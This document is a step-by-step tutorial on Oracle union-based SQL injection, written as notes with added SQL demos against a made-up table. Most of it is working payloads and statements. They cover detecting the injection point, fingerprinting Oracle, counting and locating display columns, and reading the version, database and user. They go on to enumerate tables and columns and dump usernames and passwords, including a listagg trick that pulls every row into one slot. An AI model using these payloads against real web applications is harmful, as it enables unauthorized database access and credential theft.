1. First check whether an injection point exists: and 1=1 / and 1=2 (the page should render normally for 1=1 and change or come back empty for 1=2).
2. Then determine which database it is: and (select count(*) from dual)>0
PS: dual is a default table that always exists in Oracle.
e.g.: http://xxx.xx.xx.xx:xxxx/new_list.php?id=1 and (select count(*) from dual)>0 ; if the page still renders normally, the backend is most likely Oracle. Note that MySQL also accepts from dual, so confirm with something only Oracle understands, such as and rownum=1 or the sys.v_$version query in step 5.
3. Determine the column count with order by N (order by 1, order by 2, ...) and watch whether the page still renders normally; the first N that breaks the page is one more than the number of columns in the original query.
4. Union injection: union select null,null from dual
Then replace each null with a string literal such as 'null' to find which positions are displayed on the page. Oracle requires the data types of the two union branches to match (otherwise ORA-01790), which is why the probing starts with null; for a numeric display column use a number literal instead.
5. Using the displayed positions, read the database version and the current database.
e.g.: ?id=-1 union select 'null', (select banner from sys.v_$version where rownum=1) from dual
e.g.: ?id=-1 union select 'null', (select name from v$database) from dual
A low-privileged application account often cannot read v$database (ORA-00942); sys_context('USERENV','DB_NAME') returns the database name for any user.
6. Check the current user.
e.g.: ?id=-1 union select 'null', (select sys_context('USERENV','CURRENT_USER') from dual) from dual
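The following is an added example, not from the original notes, showing steps 1 to 6 as the full statements the Oracle backend actually executes. It assumes the page's query is select title, content from news where id = <id from the URL, unquoted>; the table news and its one row are constructed for the demo.

```sql
-- Added example (not from the original notes). Assumed backend query:
--   select title, content from news where id = <untrusted id, unquoted>
-- The news table and its row are constructed for the demo.
create table news (id number, title varchar2(50), content varchar2(200));
insert into news values (1, 'first post', 'hello');
commit;

-- Step 1: boolean test. and 1=1 returns the row, and 1=2 returns nothing.
select title, content from news where id = 1 and 1=1;
select title, content from news where id = 1 and 1=2;

-- Step 2: fingerprint. dual exists on Oracle (MySQL also accepts from dual),
-- so confirm with rownum, which only Oracle understands (MySQL errors out).
select title, content from news where id = 1 and (select count(*) from dual)>0;
select title, content from news where id = 1 and rownum=1;

-- Step 3: column count. order by 2 succeeds, order by 3 fails with ORA-01785.
select title, content from news where id = 1 order by 2;

-- Step 4: union with nulls first (Oracle rejects mismatched branch types with
-- ORA-01790), then string literals to learn which slot the page prints.
select title, content from news where id = -1 union select null, null from dual;
select title, content from news where id = -1 union select 'null', 'null' from dual;

-- Steps 5-6: version, database name and current user through the second slot.
-- v$database may be unreadable for a low-privileged account (ORA-00942);
-- sys_context('USERENV','DB_NAME') works for any user.
select title, content from news where id = -1
 union select 'null', (select banner from sys.v_$version where rownum=1) from dual;
select title, content from news where id = -1
 union select 'null', (select name from v$database) from dual;
select title, content from news where id = -1
 union select 'null', sys_context('USERENV','DB_NAME') from dual;
select title, content from news where id = -1
 union select 'null', sys_context('USERENV','CURRENT_USER') from dual;
```

Each statement is what the ?id=... payload from the notes becomes once the application concatenates it into its own query; running them directly in SQL*Plus or SQL Developer against a test schema shows the exact row or error the page would reflect.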
7. Dump all the tables.
e.g.: ?id=-1 union select 'null', TABLE_NAME from USER_TABLES (returns one row per table; useful when the page prints every row)
e.g.: ?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual
e.g.: ?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name like '%user%') from dual
This is equivalent to union select 'null',(select table_name from user_tables where table_name like '%user%') from dual only when exactly one table name matches; if several match, the scalar subquery returns more than one row and Oracle raises ORA-01427, so keep rownum=1. Also note that the data dictionary stores names in uppercase unless the object was created with a quoted identifier, and like is case-sensitive by default, so use like '%USER%' for ordinary tables.
8. Dump the table's columns.
union select null,COLUMN_NAME from user_tab_columns (or all_tab_columns) where TABLE_NAME='<table name>'
e.g.: ?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and table_name='sns_users') from dual
Equivalent to:
union select 'null',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users') from dual
(user_tab_columns only covers tables owned by the current user; all_tab_columns covers every accessible table, so add an owner=... condition there if the same table name exists in several schemas. The lowercase 'sns_users' only matches a table created with a quoted lowercase name.)
Then exclude the columns already found with not in (...) to step through the rest one at a time:
union select 'null',(select column_name from user_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')) from dual
union select 'null',(select column_name from user_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME','USER_PWD')) from dual
9. Dump the data.
union select 'null', field1||'='||field2 from <table name> (pad with further null columns to match the column count found in step 3)
e.g.: ?id=-1 union select user_name,user_pwd from "sns_users"
e.g.: union select user_name,user_pwd from "sns_users" where user_name<>'hu' (skips the row already read)
- Multiple fields are joined with the || operator; in Oracle, concat() only takes two arguments, so write union select 1,field1||field2...||field_n from <table name>. The literal 1 in the first position only works when the first displayed column is numeric; use 'null' for a string column, otherwise Oracle raises ORA-01790.
e.g.: ?id=-1 union select user_name||'='||user_pwd,'null' from "sns_users" where user_name not in('hu')
union select user_name||user_pwd,'null' from "sns_users" where user_name not in('hu')
union select 'null',user_name||user_pwd from "sns_users"
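The following is an added example, not from the original notes, that runs steps 7 to 9 against a constructed table "sns_users" (quoted lowercase name, which is why table_name='sns_users' matches; an unquoted table would be stored as SNS_USERS). The rows are made up. Beyond the notes' rownum=1 plus not in (...) walk, it also shows indexing rows by position through a nested rownum and collapsing every row into one display slot with listagg.

```sql
-- Added example (not from the original notes). "sns_users" and its rows are
-- constructed for the demo; the quoted lowercase name matches 'sns_users'.
create table "sns_users" (user_name varchar2(30), user_pwd varchar2(64));
insert into "sns_users" values ('hu',    'hash1');
insert into "sns_users" values ('admin', 'hash2');
insert into "sns_users" values ('guest', 'hash3');
commit;

-- Step 7: one table name per request. rownum=1 keeps the scalar subquery to a
-- single row; without it Oracle raises ORA-01427 when several names match.
select (select table_name from user_tables
         where rownum=1 and table_name like '%user%') from dual;

-- Step 8: first column, then exclude what is already known. Column names are
-- uppercase because the columns were created unquoted.
select (select column_name from user_tab_columns
         where rownum=1 and table_name='sns_users') from dual;
select (select column_name from user_tab_columns
         where rownum=1 and table_name='sns_users'
           and column_name not in ('USER_NAME')) from dual;

-- Same walk by position: rownum is assigned after the inner order by, so the
-- n-th column is one index instead of an ever-growing not in (...) list.
select column_name
  from (select column_name, rownum rn
          from (select column_name from user_tab_columns
                 where table_name='sns_users' order by column_id))
 where rn = 2;

-- Step 9: one row per request with ||, skipping rows already read ...
select user_name||'='||user_pwd from "sns_users"
 where rownum=1 and user_name not in ('hu');

-- ... or every row in one display slot with listagg (Oracle 11gR2+), which
-- removes the per-row bookkeeping. The result must fit in 4000 bytes
-- (ORA-01489 otherwise), so chunk large tables with rownum/not in.
select listagg(user_name||'='||user_pwd, ';') within group (order by user_name)
  from "sns_users";

-- Injected form on a page that prints the second of two columns:
-- ?id=-1 union select 'null',(select listagg(user_name||'='||user_pwd,';')
--   within group (order by user_name) from "sns_users") from dual
```

The select (...) from dual wrappers are exactly the scalar subqueries the notes place in the displayed union slot, so each statement can be tested on its own before being folded into a ?id=-1 union select 'null',(...) from dual payload.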